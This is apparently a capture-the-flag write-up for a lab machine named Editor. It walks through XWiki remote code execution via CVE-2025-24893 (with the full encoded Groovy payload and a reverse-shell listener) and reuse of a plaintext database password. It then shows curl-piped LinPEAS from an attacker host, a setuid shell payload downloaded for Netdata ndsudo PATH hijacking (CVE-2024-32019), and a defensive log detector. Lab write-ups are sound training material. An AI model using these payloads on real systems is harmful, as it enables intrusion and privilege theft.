![[Editor.png]]
# **Nmap Results**
```bash
# Replace <target_ip> and <target_domain>
echo -e "\ntarget_ip=10.129.30.58\ntarget_domain=editor.htb" | tee -a ~/.bashrc
exec bash
echo "$target_ip $target_domain" | sudo tee -a /etc/hosts
mkdir -p ~/my_data/$target_domain/nmap && cd ~/my_data/$target_domain
# Scan all TCP ports
sudo nmap -sC -sV -oA nmap/full.tcp -p- $target_ip -vvv
# Scan top 1000 UDP ports
sudo nmap -sU -oA nmap/initial.udp $target_ip -vvv
# Scan top 100 UDP ports using a faster timing template
sudo nmap -sU -oA nmap/fast.udp -T4 -F $target_ip -vvv
```
```text
# Nmap 7.94SVN scan initiated Wed Oct 29 13:46:33 2025 as: nmap -sC -sV -oA nmap/full.tcp -p- -vvv 10.129.30.58
Nmap scan report for 10.129.30.58
Host is up, received echo-reply ttl 63 (0.0088s latency).
Scanned at 2025-10-29 13:46:33 CDT for 23s
Not shown: 64561 closed tcp ports (reset), 971 filtered tcp ports (no-response)
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 63 OpenSSH 8.9p1 Ubuntu 3ubuntu0.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 3e:ea:45:4b:c5:d1:6d:6f:e2:d4:d1:3b:0a:3d:a9:4f (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBJ+m7rYl1vRtnm789pH3IRhxI4CNCANVj+N5kovboNzcw9vHsBwvPX3KYA3cxGbKiA0VqbKRpOHnpsMuHEXEVJc=
| 256 64:cc:75:de:4a:e6:a5:b4:73:eb:3f:1b:cf:b4:e3:94 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIOtuEdoYxTohG80Bo6YCqSzUY9+qbnAFnhsk4yAZNqhM
80/tcp open http syn-ack ttl 63 nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
| http-methods:
|_ Supported Methods: GET POST OPTIONS
|_http-title: Did not follow redirect to http://editor.htb/
8080/tcp open http syn-ack ttl 63 Jetty 10.0.20
| http-webdav-scan:
| WebDAV type: Unknown
| Server Type: Jetty(10.0.20)
|_ Allowed Methods: OPTIONS, GET, HEAD, PROPFIND, LOCK, UNLOCK
| http-cookie-flags:
| /:
| JSESSIONID:
|_ httponly flag not set
| http-methods:
| Supported Methods: OPTIONS GET HEAD PROPFIND LOCK UNLOCK
|_ Potentially risky methods: PROPFIND LOCK UNLOCK
|_http-open-proxy: Proxy might be redirecting requests
| http-robots.txt: 50 disallowed entries (40 shown)
| /xwiki/bin/viewattachrev/ /xwiki/bin/viewrev/
| /xwiki/bin/pdf/ /xwiki/bin/edit/ /xwiki/bin/create/
| /xwiki/bin/inline/ /xwiki/bin/preview/ /xwiki/bin/save/
| /xwiki/bin/saveandcontinue/ /xwiki/bin/rollback/ /xwiki/bin/deleteversions/
| /xwiki/bin/cancel/ /xwiki/bin/delete/ /xwiki/bin/deletespace/
| /xwiki/bin/undelete/ /xwiki/bin/reset/ /xwiki/bin/register/
| /xwiki/bin/propupdate/ /xwiki/bin/propadd/ /xwiki/bin/propdisable/
| /xwiki/bin/propenable/ /xwiki/bin/propdelete/ /xwiki/bin/objectadd/
| /xwiki/bin/commentadd/ /xwiki/bin/commentsave/ /xwiki/bin/objectsync/
| /xwiki/bin/objectremove/ /xwiki/bin/attach/ /xwiki/bin/upload/
| /xwiki/bin/temp/ /xwiki/bin/downloadrev/ /xwiki/bin/dot/
| /xwiki/bin/delattachment/ /xwiki/bin/skin/ /xwiki/bin/jsx/ /xwiki/bin/ssx/
| /xwiki/bin/login/ /xwiki/bin/loginsubmit/ /xwiki/bin/loginerror/
|_/xwiki/bin/logout/
|_http-server-header: Jetty(10.0.20)
| http-title: XWiki - Main - Intro
|_Requested resource was http://10.129.30.58:8080/xwiki/bin/view/Main/
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Oct 29 13:46:56 2025 -- 1 IP address (1 host up) scanned in 23.41 seconds
```
# **Service Enumeration**
## **TCP/80**
### **Crawling the Website**
Manual enumeration of the website revealed a subdomain of interest, `wiki.editor.htb`. After adding it to `/etc/hosts`, I was able to access a wiki. At the bottom of the page was software and version information (`XWiki 15.10.8`). Researching this particular version of XWiki led to the discovery of CVE-2025-24893. Exploiting this vulnerability allows an unauthenticated user to execute code remotely.
![[Editor - Manual Enumeration.png]]
![[Editor - Xwiki.png]]
# **Exploit**
## **CVE-2025-24893**
There is a public PoC on GitHub that is hardcoded to retrieve the contents of `/etc/passwd`. The script's output provides the URL used for RCE. Using Burp Suite, it is possible to modify the request and obtain a reverse shell.
```bash
# Initial request to read /etc/passwd
http://wiki.editor.htb/xwiki/bin/get/Main/SolrSearch?media=rss&text=%7d%7d%7d%7b%7basync%20async%3dfalse%7d%7d%7b%7bgroovy%7d%7dprintln(%22cat%20/etc/passwd%22.execute().text)%7b%7b%2fgroovy%7d%7d%7b%7b%2fasync%7d%7d
```
![[Editor - Testing RCE.png]]
Set up a listener on the op station and send the request.
```bash
nc -lvnp 58951
```
![[Editor - Reverse Shell.png]]
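From the defender's side, the request above is easy to spot once the `text` parameter is URL-decoded: the payload closes the surrounding macro with `}}}` and opens a new `{{async}}`/`{{groovy}}` block. The following detector is an added example, not part of the writeup or of XWiki; the nginx-style log lines are constructed (the first carries the exact URL shown above), and the macro names beyond `async` and `groovy` broaden the check to XWiki's other script macros.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample access-log lines; only the first is a macro injection.
SAMPLE_LOG = """\
10.10.15.9 - - [29/Oct/2025:13:52:10 -0500] "GET /xwiki/bin/get/Main/SolrSearch?media=rss&text=%7d%7d%7d%7b%7basync%20async%3dfalse%7d%7d%7b%7bgroovy%7d%7dprintln(%22cat%20/etc/passwd%22.execute().text)%7b%7b%2fgroovy%7d%7d%7b%7b%2fasync%7d%7d HTTP/1.1" 200 1843
10.10.15.9 - - [29/Oct/2025:13:50:01 -0500] "GET /xwiki/bin/get/Main/SolrSearch?media=rss&text=editor HTTP/1.1" 200 512
10.129.30.1 - - [29/Oct/2025:13:51:44 -0500] "GET /xwiki/bin/view/Main/ HTTP/1.1" 200 9021
"""

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/')
# Closing braces that break out of the original macro, followed by a fresh script macro.
MACRO_INJECTION = re.compile(r"\}\}\}?\s*\{\{\s*(async|groovy|velocity|python|script)\b", re.I)


def is_solr_macro_injection(target):
    """True when a SolrSearch request carries a macro break-out in its decoded text parameter."""
    url = urlsplit(target)
    if not url.path.endswith("/SolrSearch"):
        return False
    # parse_qs percent-decodes the value, so %7d%7b%7basync becomes }{{async
    for value in parse_qs(url.query).get("text", []):
        if MACRO_INJECTION.search(value):
            return True
    return False


def flag_requests(log_text):
    """Return the request targets in an access log that match the injection pattern."""
    hits = []
    for line in log_text.splitlines():
        match = REQUEST_RE.search(line)
        if match and is_solr_macro_injection(match.group("target")):
            hits.append(match.group("target"))
    return hits


if __name__ == "__main__":
    for target in flag_requests(SAMPLE_LOG):
        print("macro injection:", target)
```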
## **XWiki Configuration Files**
There are a handful of configuration files associated with XWiki. Looking at these files, I found a potential password. Thanks to password reuse, I was able to SSH into the target as `oliver`.
```bash
find /usr/lib/xwiki \( -name xwiki.properties -o -name xwiki.cfg -o -name hibernate.cfg.xml -o -name logback.xml \) -exec grep password -C 3 {} \;
```
```text
# Contents of hibernate.cfg.xml
-->
<property name="hibernate.connection.url">jdbc:mysql://localhost/xwiki?useSSL=false&connectionTimeZone=LOCAL&allowPublicKeyRetrieval=true</property>
<property name="hibernate.connection.username">xwiki</property>
<property name="hibernate.connection.password">theEd1t0rTeam99</property>
<property name="hibernate.connection.driver_class">com.mysql.cj.jdbc.Driver</property>
<property name="hibernate.dbcp.poolPreparedStatements">true</property>
<property name="hibernate.dbcp.maxOpenPreparedStatements">20</property>
--
```
```text
oliver::theEd1t0rTeam99
```
# **Post-Exploit Enumeration**
## **Operating Environment**
> [!tldr]- OS & Kernel
>```bash
>oliver@editor:~$ uname -a
>Linux editor 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC 2025 x86_64 x86_64 x86_64 GNU/Linux
>oliver@editor:~$ cat /etc/*elease
>DISTRIB_ID=Ubuntu
>DISTRIB_RELEASE=22.04
>DISTRIB_CODENAME=jammy
>DISTRIB_DESCRIPTION="Ubuntu 22.04.5 LTS"
>PRETTY_NAME="Ubuntu 22.04.5 LTS"
>NAME="Ubuntu"
>VERSION_ID="22.04"
>VERSION="22.04.5 LTS (Jammy Jellyfish)"
>VERSION_CODENAME=jammy
>ID=ubuntu
>ID_LIKE=debian
>HOME_URL="https://www.ubuntu.com/"
>SUPPORT_URL="https://help.ubuntu.com/"
>BUG_REPORT_URL="https://bugs.launchpad.net/ubuntu/"
>PRIVACY_POLICY_URL="https://www.ubuntu.com/legal/terms-and-policies/privacy-policy"
>UBUNTU_CODENAME=jammy
>```
> [!tldr]- Current User
>```bash
>oliver@editor:~$ id
>uid=1000(oliver) gid=1000(oliver) groups=1000(oliver),999(netdata)
>oliver@editor:~$ sudo -l
>[sudo] password for oliver:
>Sorry, user oliver may not run sudo on editor.
>```
## **Users and Groups**
> [!tldr]- Local Users
>```bash
>oliver@editor:~$ cat /etc/passwd
>root:x:0:0:root:/root:/bin/bash
>daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
>bin:x:2:2:bin:/bin:/usr/sbin/nologin
>sys:x:3:3:sys:/dev:/usr/sbin/nologin
>sync:x:4:65534:sync:/bin:/bin/sync
>games:x:5:60:games:/usr/games:/usr/sbin/nologin
>man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
>lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
>mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
>news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
>uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
>proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
>www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
>backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
>list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
>irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
>gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
>nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
>_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
>systemd-network:x:101:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
>systemd-resolve:x:102:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
>messagebus:x:103:104::/nonexistent:/usr/sbin/nologin
>systemd-timesync:x:104:105:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
>pollinate:x:105:1::/var/cache/pollinate:/bin/false
>sshd:x:106:65534::/run/sshd:/usr/sbin/nologin
>syslog:x:107:113::/home/syslog:/usr/sbin/nologin
>uuidd:x:108:114::/run/uuidd:/usr/sbin/nologin
>tcpdump:x:109:115::/nonexistent:/usr/sbin/nologin
>tss:x:110:116:TPM software stack,,,:/var/lib/tpm:/bin/false
>landscape:x:111:117::/var/lib/landscape:/usr/sbin/nologin
>fwupd-refresh:x:112:118:fwupd-refresh user,,,:/run/systemd:/usr/sbin/nologin
>usbmux:x:113:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
>lxd:x:999:100::/var/snap/lxd/common/lxd:/bin/false
>dnsmasq:x:114:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
>mysql:x:115:121:MySQL Server,,,:/nonexistent:/bin/false
>tomcat:x:998:998:Apache Tomcat:/var/lib/tomcat:/usr/sbin/nologin
>xwiki:x:997:997:XWiki:/var/lib/xwiki:/usr/sbin/nologin
>netdata:x:996:999:netdata:/opt/netdata:/usr/sbin/nologin
>oliver:x:1000:1000:,,,:/home/oliver:/bin/bash
>_laurel:x:995:995::/var/log/laurel:/bin/false
>```
> [!tldr]- Local Groups
>```bash
>oliver@editor:~$ cat /etc/group
>root:x:0:
>daemon:x:1:
>bin:x:2:
>sys:x:3:
>adm:x:4:syslog,netdata
>tty:x:5:
>disk:x:6:
>lp:x:7:
>mail:x:8:
>news:x:9:
>uucp:x:10:
>man:x:12:
>proxy:x:13:netdata
>kmem:x:15:
>dialout:x:20:
>fax:x:21:
>voice:x:22:
>cdrom:x:24:
>floppy:x:25:
>tape:x:26:
>sudo:x:27:
>audio:x:29:
>dip:x:30:
>www-data:x:33:
>backup:x:34:
>operator:x:37:
>list:x:38:
>irc:x:39:
>src:x:40:
>gnats:x:41:
>shadow:x:42:
>utmp:x:43:
>video:x:44:
>sasl:x:45:
>plugdev:x:46:
>staff:x:50:
>games:x:60:
>users:x:100:
>nogroup:x:65534:
>systemd-journal:x:101:
>systemd-network:x:102:
>systemd-resolve:x:103:
>messagebus:x:104:
>systemd-timesync:x:105:
>input:x:106:
>sgx:x:107:
>kvm:x:108:
>render:x:109:
>lxd:x:110:
>_ssh:x:111:
>crontab:x:112:
>syslog:x:113:
>uuidd:x:114:
>tcpdump:x:115:
>tss:x:116:
>landscape:x:117:
>fwupd-refresh:x:118:
>netdev:x:119:
>docker:x:120:netdata
>mysql:x:121:
>tomcat:x:998:
>xwiki:x:997:
>netdata:x:999:oliver
>oliver:x:1000:
>_laurel:x:995:
>oliver@editor:~$ cat /etc/group | grep oliver
>netdata:x:999:oliver
>oliver:x:1000:
>```
## **Network Configurations**
> [!tldr]- Network Interfaces
>```bash
>oliver@editor:~$ ip addr
>1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
> link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
> inet 127.0.0.1/8 scope host lo
> valid_lft forever preferred_lft forever
> inet6 ::1/128 scope host
> valid_lft forever preferred_lft forever
>2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
> link/ether 00:50:56:b0:bc:5a brd ff:ff:ff:ff:ff:ff
> altname enp2s0
> altname ens32
> inet 10.129.30.58/16 brd 10.129.255.255 scope global dynamic eth0
> valid_lft 3541sec preferred_lft 3541sec
>3: docker0: <NO-CARRIER,BROADCAST,MULTICAST,UP> mtu 1500 qdisc noqueue state DOWN group default
> link/ether 02:42:57:f0:35:4b brd ff:ff:ff:ff:ff:ff
> inet 172.17.0.1/16 brd 172.17.255.255 scope global docker0
> valid_lft forever preferred_lft forever
>```
> [!tldr]- Open Ports
>```bash
>oliver@editor:~$ ss -tanup | grep -i listen
>tcp LISTEN 0 4096 127.0.0.1:8125 0.0.0.0:*
>tcp LISTEN 0 128 0.0.0.0:22 0.0.0.0:*
>tcp LISTEN 0 511 0.0.0.0:80 0.0.0.0:*
>tcp LISTEN 0 4096 127.0.0.1:19999 0.0.0.0:*
>tcp LISTEN 0 4096 127.0.0.1:40137 0.0.0.0:*
>tcp LISTEN 0 151 127.0.0.1:3306 0.0.0.0:*
>tcp LISTEN 0 4096 127.0.0.53%lo:53 0.0.0.0:*
>tcp LISTEN 0 70 127.0.0.1:33060 0.0.0.0:*
>tcp LISTEN 0 50 [::ffff:127.0.0.1]:8079 *:*
>tcp LISTEN 0 128 [::]:22 [::]:*
>tcp LISTEN 0 511 [::]:80 [::]:*
>tcp LISTEN 0 50 *:8080 *:*
>```
## **Interesting Files**
> [!tldr]- SUID Binaries
>```bash
>oliver@editor:~$ find / -type f -perm /4000 -exec ls -l {} \; 2>/dev/null
>-rwsr-x--- 1 root netdata 965056 Apr 1 2024 /opt/netdata/usr/libexec/netdata/plugins.d/cgroup-network
>-rwsr-x--- 1 root netdata 1377624 Apr 1 2024 /opt/netdata/usr/libexec/netdata/plugins.d/network-viewer.plugin
>-rwsr-x--- 1 root netdata 1144224 Apr 1 2024 /opt/netdata/usr/libexec/netdata/plugins.d/local-listeners
>-rwsr-x--- 1 root netdata 200576 Apr 1 2024 /opt/netdata/usr/libexec/netdata/plugins.d/ndsudo
>-rwsr-x--- 1 root netdata 81472 Apr 1 2024 /opt/netdata/usr/libexec/netdata/plugins.d/ioping
>-rwsr-x--- 1 root netdata 896448 Apr 1 2024 /opt/netdata/usr/libexec/netdata/plugins.d/nfacct.plugin
>-rwsr-x--- 1 root netdata 4261672 Apr 1 2024 /opt/netdata/usr/libexec/netdata/plugins.d/ebpf.plugin
>-rwsr-xr-x 1 root root 40496 Feb 6 2024 /usr/bin/newgrp
>-rwsr-xr-x 1 root root 72072 Feb 6 2024 /usr/bin/gpasswd
>-rwsr-xr-x 1 root root 55680 Apr 9 2024 /usr/bin/su
>-rwsr-xr-x 1 root root 35200 Apr 9 2024 /usr/bin/umount
>-rwsr-xr-x 1 root root 44808 Feb 6 2024 /usr/bin/chsh
>-rwsr-xr-x 1 root root 35200 Mar 23 2022 /usr/bin/fusermount3
>-rwsr-xr-x 1 root root 232416 Jun 25 12:48 /usr/bin/sudo
>-rwsr-xr-x 1 root root 59976 Feb 6 2024 /usr/bin/passwd
>-rwsr-xr-x 1 root root 47488 Apr 9 2024 /usr/bin/mount
>-rwsr-xr-x 1 root root 72712 Feb 6 2024 /usr/bin/chfn
>-rwsr-xr-- 1 root messagebus 35112 Oct 25 2022 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
>-rwsr-xr-x 1 root root 338536 Apr 11 2025 /usr/lib/openssh/ssh-keysign
>-rwsr-xr-x 1 root root 18736 Feb 26 2022 /usr/libexec/polkit-agent-helper-1
>```
# **Privilege Escalation**
## **CVE-2024-32019**
Post-exploit enumeration was automated with LinPEAS.
```bash
# Ran on the op station
mkdir -p www && cd www
wget https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh -O l.sh
python3 -m http.server 8443
```
```bash
# Ran on target
curl http://10.10.15.9:8443/l.sh | sh
```
Looking at the output, there were unknown SUID binaries. After a bit of research, I discovered `ndsudo` had a known vulnerability, CVE-2024-32019. Exploiting this vulnerability allows for a local privilege escalation. Per the advisory:
> The `ndsudo` tool is packaged as a `root`-owned executable with the SUID bit set. It only runs a restricted set of external commands, but its search paths are supplied by the `PATH` environment variable. This allows an attacker to control where `ndsudo` looks for these commands, which may be a path the attacker has write access to.
> As a user that has permission to run `ndsudo`:
> 1. Place an executable with a name that is on `ndsudo`’s list of commands (e.g. `nvme`) in a writable path
> 2. Set the `PATH` environment variable so that it contains this path
> 3. Run `ndsudo` with a command that will run the aforementioned executable
```text
# Linpeas output
╔════════════════════════════════════╗
══════════════════════╣ Files with Interesting Permissions ╠══════════════════════
╚════════════════════════════════════╝
╔══════════╣ SUID - Check easy privesc, exploits and write perms
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#sudo-and-suid
-rwsr-x--- 1 root netdata 943K Apr 1 2024 /opt/netdata/usr/libexec/netdata/plugins.d/cgroup-network (Unknown SUID binary!)
-rwsr-x--- 1 root netdata 1.4M Apr 1 2024 /opt/netdata/usr/libexec/netdata/plugins.d/network-viewer.plugin (Unknown SUID binary!)
-rwsr-x--- 1 root netdata 1.1M Apr 1 2024 /opt/netdata/usr/libexec/netdata/plugins.d/local-listeners (Unknown SUID binary!)
-rwsr-x--- 1 root netdata 196K Apr 1 2024 /opt/netdata/usr/libexec/netdata/plugins.d/ndsudo (Unknown SUID binary!)
-rwsr-x--- 1 root netdata 80K Apr 1 2024 /opt/netdata/usr/libexec/netdata/plugins.d/ioping (Unknown SUID binary!)
-rwsr-x--- 1 root netdata 876K Apr 1 2024 /opt/netdata/usr/libexec/netdata/plugins.d/nfacct.plugin (Unknown SUID binary!)
-rwsr-x--- 1 root netdata 4.1M Apr 1 2024 /opt/netdata/usr/libexec/netdata/plugins.d/ebpf.plugin (Unknown SUID binary!)
```
```bash
# Ran on the op station
cat > payload.c << EOF
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
int main() {
setuid(0);
setgid(0);
execl("/bin/bash", "bash", NULL);
return 0;
}
EOF
gcc -static payload.c -o www/nvme -Wall -Werror -Wpedantic
```
```bash
# Ran on target
wget http://10.10.15.9:8443/nvme -O /tmp/nvme
chmod +x /tmp/nvme
PATH=/tmp:$PATH /opt/netdata/usr/libexec/netdata/plugins.d/ndsudo nvme-list
```
# **Flags**
> [!tldr]- User
>
> `97a1d6e6f10b8e7f8ca8c88d29ec78ac`
> [!tldr]- Root
>
> `3e7e5d5864fb1a316a91887390398d83`
# **References**
- [CVE-2025-24893](https://nvd.nist.gov/vuln/detail/CVE-2025-24893)
- [CVE-2025-24893 POC](https://github.com/a1baradi/Exploit/blob/main/CVE-2025-24893.py)
- [CVE-2024-32019](https://nvd.nist.gov/vuln/detail/CVE-2024-32019)
- [CVE-2024-32019 Advisory](https://github.com/netdata/netdata/security/advisories/GHSA-pmhq-4cxq-wj93)